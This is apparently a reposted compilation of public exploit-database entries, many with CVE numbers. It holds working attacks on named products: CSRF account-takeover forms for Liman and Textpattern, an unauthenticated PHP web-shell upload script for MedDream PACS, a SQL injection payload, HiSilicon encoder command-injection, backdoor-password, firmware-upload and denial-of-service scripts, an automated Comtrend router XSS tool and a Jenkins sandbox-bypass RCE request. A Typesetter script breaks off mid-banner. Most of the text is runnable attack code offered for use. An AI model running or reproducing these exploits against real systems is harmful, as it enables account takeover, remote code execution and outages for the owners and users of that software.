HireHackking

# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password) # Date: 2020-10-07 # Exploit Author: George Tsimpidas # Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 # Version: 0.7 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp Description: There is no CSRF protection in Liman application, with a little help of social engineering (like sending a link via email/chat) an attacker may force the victim to click on a malicious link, with the purpose of manipulating his current account information, or changing entirely his password. Vulnerable Endpoints : http://127.0.0.1:5000/settings/profile http://127.0.0.1:5000/settings/password Proof of Concept Download the application, make an account and login inside the panel under : http://127.0.0.1:5000 expose the docker port on 5000. Save this .html files and send it to victim (Victim should be logged in in the browser) Crafted value will be added. Account Information CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/profile" method="POST"> <input type="hidden" name="username" value="betatest" /> <input type="hidden" name="email" value="test@gmail.com" /> <input type="submit" value="TakeOver Account Settings" /> </body> </html> Password Change CSRF : <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:5000/settings/password" method="POST"> <input type="hidden" name="password" value="takeover" /> <input type="hidden" name="newPassword" value="takeover" /> <input type="hidden" name="confirmPassword" value="takeover" /> <input type="submit" value="Password TakeOver" /> </body> </html>

#!/usr/bin/python # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Date: 10-10-2020 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter command: whoami # 170759 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") cmd = raw_input("Enter command: ") URL= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] site = session.post(URL, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main()

# Exploit Title: Small CRM 2.0 - 'email' SQL Injection # Google Dork: N/A # Date: 2020-10-10 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/small-crm-php/ # Version: V2.0 # Tested on: Kali Linux # CVE : N/A ========== Vulnerable Code ========== mysqli_query $row1 = mysqli_query($con, "select email,password from user where email='" . $_POST['email'] . "'"); // dbconnection.php ========== Post Request ==================== POST /crm/forgot-password.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: localhost/crm/forgot-password.php Content-Type: application/x-www-form-urlencoded Content-Length: 20 Connection: close Cookie: __test=ec283e73906679549573af64209a5d5b; PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497 Upgrade-Insecure-Requests: 1 email=test@test.com&submit= ============= Vulnerable Parameter =============== email (POST) ============= Payload ========================= ' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24217 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <command>" exit 1 fi printf "executing the command... " if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null then echo "SUCCESS: remote command executed" else echo "ERROR: $?" fi

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - full admin access via backdoor password # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24215 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 1 ] then echo "Usage: $0 <server>[:<port>]" exit 1 fi printf "retrieving the password... " password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \ grep -oP '(?<=<html_password>).*?(?=</html_password>)') ret=$? if [ "$ret" -eq 0 ] then echo "the password is '$password'" echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'" else echo "ERROR: curl returned $ret" fi

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24217 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <command>" exit 1 fi printf "creating uk.rar... " echo "$2" > uk.txt rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; } echo "done" rm uk.txt printf "uploading the RAR file... " if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null then echo "SUCCESS: remote command executed" rm uk.rar else echo "ERROR: $?" fi

# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City # Google Dork: N/A # Date: 2020-10-08 # Exploit Author: Kokn3t # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/hostel-management-system # Version: V 2.1 # Tested on: Windows 10, Kali 2020.1 # CVE : CVE-2020-25270 ######## Attack Vector ######## Install Hostel Management System V 2.1 1) User Module Login as user and go to "Book Hostel" (http:/localhost/hostel/book-hostel.php) and start booking. Add malicious script in these fields - "<script>alert('XSS');</script>" i. Guardian Name ii. Guardian Relation iii.Guardian Contact no iv. Address vi. City After that will get a prompt "Student Successfully register" and after pressing "See All", XSS will be triggered. 2) Admin Module Login in as Admin and go to "Management Students", and "View Full details" of booked student's record, XSS will be triggered also.

# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in # Date: 8th October 2020 # Exploit Author: dmw0ng # Vendor Homepage: https://www.jenkins.io # Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip # Version: Jenkins 2.63 # Tested on: Ubuntu 18.04 / 20.04 # CVE : CVE-2019-1003030 GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0 Connection: close Upgrade-Insecure-Requests: 1 URL Encoding the following for RCE ```public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } ``` to %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS) # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24214 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "usage: $0 <server> <RTSP port>" exit 1 fi server=$1 port=$2 printf "checking the target... " timeout 2 curl -s rtsp://$server:$port \ || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; } printf "RTSP server detected\n" cseq=$(printf "0%0.s" {1..3000}) printf "sending the payload... " printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1 printf "done\n" sleep 1 printf "checking the target again... " if timeout 2 curl -s rtsp://$server:$port then echo "ERROR: the RTSP server still seems to be running :(" else echo "SUCCESS: the server is down" fi

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Exploit Title: Persistent XSS on Comtrend AR-5387un router Date: 19/10/2020 Exploit Author: OscarAkaElvis Vendor Homepage: https://www.comtrend.com/ Version: Comtrend AR-5387un router Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i CVE: CVE-2018-8062 Disclosure timeline: 08/03/2018: Vulnerability was discovered 10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062) 11/03/2018: Mitre answered, CVE number reserved 11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered 16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233) 18/10/2020: Exploit creation 19/10/2020: Exploit sent to exploit-db Exploitation explanation: To exploit this vulnerability, once logged into the router, a WAN service must be created Click on "Advanced Setup", "WAN Service". "Add button", "Next" Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script> Then click on "Next" four times to go on through the steps and finally click on "Apply/Save" The result of the XSS will be displayed and triggered on the WAN services page This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload Happy hacking :) OscarAkaElvis - https://twitter.com/OscarAkaElvis """ # Dependencies and libraries import requests from requests.auth import HTTPBasicAuth import re from sys import argv, exit import argparse from os import path from time import sleep class Exploit(object): # Global class vars session = requests.Session() user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36" ip = None username = None password = None payload = None default_ip = "192.168.1.1" default_username = "admin" default_password = "admin" default_payload = "<script>alert('xss');</script>" exploit_version = "1.0" current_sessionkey = None referer_sessionkey = None script_name = path.basename(argv[0]) description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router' epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\'' def start_msg(self): print("[*] Starting CVE-2018-8062 exploit...") sleep(0.5) def check_params(self, arguments): parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text) parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP') parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME') parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD') parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD') parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit") args = parser.parse_args(arguments) self.start_msg() print("[*] Launch the exploit using -h argument to check all the available options") print() if not args.ip: self.ip = self.default_ip print("[!] Warning, no ip set, default will be used: " + str(self.ip)) else: self.ip = args.ip if not args.username: self.username = self.default_username print("[!] Warning, no username set, default will be used: " + str(self.username)) else: self.username = args.username if not args.password: self.password = self.default_password print("[!] Warning, no password set, default will be used: " + str(self.password)) else: self.password = args.password if not args.payload: self.payload = self.default_payload print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload)) else: self.password = args.password def print_version(self): print() return 'v{}'.format(self.exploit_version) def check_router(self): try: print() print("[*] Trying to detect router...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers) if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)): print("[+] Comtrend router detected successfully") else: print() print("[-] It seems the target is not a Comtrend router") print("[*] Exiting...") exit(1) except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError): print() print("[-] Can't connect to the router") print("[*] Exiting...") exit(1) def check_login(self): print() print("[*] Trying to login...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) if response.status_code != 401: print("[+] Login successfully!") sleep(1) else: print() print("[-] Can't login into the router. Check your creds!") print("[*] Exiting...") exit(1) def get_sessionKey(self, response_text): sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text)) if sessionKey is not None: sessionKey = sessionKey.group(1) else: sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE) if sessionKey is not None: sessionKey = sessionKey.group(1) return sessionKey def step1(self): print() print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.current_sessionkey = self.get_sessionKey(response.content) print("[+] Success! Initial sessionKey: " + self.current_sessionkey) sleep(1) def step2(self): print() print("[*] Performing step 2/8...") paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"} response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step3(self): print() print("[*] Performing step 3/8...") paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step4(self): print() print("[*] Performing step 4/8...") paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step5(self): print() print("[*] Performing step 5/8...") paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step6(self): print() print("[*] Performing step 6/8...") paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step7(self): print() print("[*] Performing step 7/8...") paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def final_step8(self): print() print("[*] Performing final step 8/8. Deploying XSS payload...") paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey} self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) print() print("[+] XSS payload deployed successfully") print("[+] Happy hacking :) . Author: OscarAkaElvis") @staticmethod def main(self, arguments): self.check_params(arguments) self.check_router() self.check_login() self.step1() self.step2() self.step3() self.step4() self.step5() self.step6() self.step7() self.final_step8() exit(0) if __name__ == '__main__': ImportObject = Exploit() ImportObject.main(ImportObject, argv[1:])

# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery # Exploit Author: Alperen Ergel # Contact: @alpren_ae # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 ######## Description ######## # # 1-) Loggin administrator page # # 2-) Go admin > prefs > site # # 3-) All inputs vulnerable to CSRF # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/textpattern/textpattern/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 1806 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 Upgrade-Insecure-Requests: 1 Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 ### EXPLOIT #### <html> <!-- CSRF PoC --> <body> <form action="https://localhost/textpattern/textpattern/index.php" method="POST"> <input type="hidden" name="Submit" value="Save" /> <input type="hidden" name="sitename" value="CHANGEHERE" /> <input type="hidden" name="siteurl" value="CHANGEHERE" /> <input type="hidden" name="site&#95;slogan" value="CHANGEHERE" /> <input type="hidden" name="production&#95;status" value="testing" /> <input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" /> <input type="hidden" name="auto&#95;dst" value="0" /> <input type="hidden" name="is&#95;dst" value="0" /> <input type="hidden" name="dateformat" value="since" /> <input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" /> <input type="hidden" name="doctype" value="html5" /> <input type="hidden" name="logging" value="none" /> <input type="hidden" name="expire&#95;logs&#95;after" value="7" /> <input type="hidden" name="use&#95;comments" value="1" /> <input type="hidden" name="img&#95;dir" value="images" /> <input type="hidden" name="skin&#95;dir" value="themes" /> <input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" /> <input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" /> <input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" /> <input type="hidden" name="plugin&#95;cache&#95;dir" value="" /> <input type="hidden" name="smtp&#95;from" value="" /> <input type="hidden" name="publisher&#95;email" value="" /> <input type="hidden" name="override&#95;emailcharset" value="0" /> <input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" /> <input type="hidden" name="default&#95;event" value="article" /> <input type="hidden" name="theme&#95;name" value="hive" /> <input type="hidden" name="module&#95;pophelp" value="1" /> <input type="hidden" name="default&#95;publish&#95;status" value="4" /> <input type="hidden" name="title&#95;no&#95;widow" value="0" /> <input type="hidden" name="articles&#95;use&#95;excerpts" value="1" /> <input type="hidden" name="allow&#95;form&#95;override" value="1" /> <input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" /> <input type="hidden" name="permlink&#95;format" value="1" /> <input type="hidden" name="send&#95;lastmod" value="1" /> <input type="hidden" name="publish&#95;expired&#95;articles" value="0" /> <input type="hidden" name="use&#95;textile" value="1" /> <input type="hidden" name="enable&#95;short&#95;tags" value="1" /> <input type="hidden" name="use&#95;plugins" value="1" /> <input type="hidden" name="admin&#95;side&#95;plugins" value="1" /> <input type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" /> <input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" /> <input type="hidden" name="max&#95;url&#95;len" value="1000" /> <input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" /> <input type="hidden" name="rss&#95;how&#95;many" value="5" /> <input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" /> <input type="hidden" name="include&#95;email&#95;atom" value="0" /> <input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" /> <input type="hidden" name="comments&#95;on&#95;default" value="0" /> <input type="hidden" name="comments&#95;default&#95;invite" value="Comment" /> <input type="hidden" name="comments&#95;moderate" value="1" /> <input type="hidden" name="comments&#95;disabled&#95;after" value="42" /> <input type="hidden" name="comments&#95;auto&#95;append" value="0" /> <input type="hidden" name="comments&#95;mode" value="0" /> <input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="comments&#95;sendmail" value="0" /> <input type="hidden" name="comments&#95;are&#95;ol" value="1" /> <input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" /> <input type="hidden" name="comments&#95;require&#95;name" value="1" /> <input type="hidden" name="comments&#95;require&#95;email" value="1" /> <input type="hidden" name="never&#95;display&#95;email" value="1" /> <input type="hidden" name="comment&#95;nofollow" value="1" /> <input type="hidden" name="comments&#95;disallow&#95;images" value="0" /> <input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" /> <input type="hidden" name="spam&#95;blacklists" value="" /> <input type="hidden" name="custom&#95;1&#95;set" value="custom1" /> <input type="hidden" name="custom&#95;2&#95;set" value="custom2" /> <input type="hidden" name="custom&#95;3&#95;set" value="" /> <input type="hidden" name="custom&#95;4&#95;set" value="" /> <input type="hidden" name="custom&#95;5&#95;set" value="" /> <input type="hidden" name="custom&#95;6&#95;set" value="" /> <input type="hidden" name="custom&#95;7&#95;set" value="" /> <input type="hidden" name="custom&#95;8&#95;set" value="" /> <input type="hidden" name="custom&#95;9&#95;set" value="" /> <input type="hidden" name="custom&#95;10&#95;set" value="" /> <input type="hidden" name="step" value="prefs&#95;save" /> <input type="hidden" name="event" value="prefs" /> <input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" /> <input type="submit" value="Do Action" /> </form> </body> </html>

# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution # Exploit Author: Rodolfo "t0gu" Tavares # Contact: @t0guu (TW) # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: Linux / Apache # Category: WebApp # Google Dork: intext:"Powered by Typesetter" # Date: 2020-09-29 # CVE : CVE-2020-25790 ######## Description ######## # # The CMS Typesetter has functionality (web interface) where it is possible # through an account with privileges to perform uploads. Through this # functionality, it is possible to upload a .zip file that contains a # malicious .php file. In the same functionality, there is also the # possibility to extract the file through the same web interface, the # attacker only needs to extract the .zip that was previously loaded and # click on the malicious .php file to execute commands in the operating # system. # ######## Exploit with Poc ######## https://github.com/t0gu/CVE-2020-25790 ####### Code ####### # see the poc at https://github.com/t0gu/CVE-2020-25790 import argparse from bs4 import BeautifulSoup import requests import sys import re import urllib3 from urllib3.exceptions import InsecureRequestWarning banner = """ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ 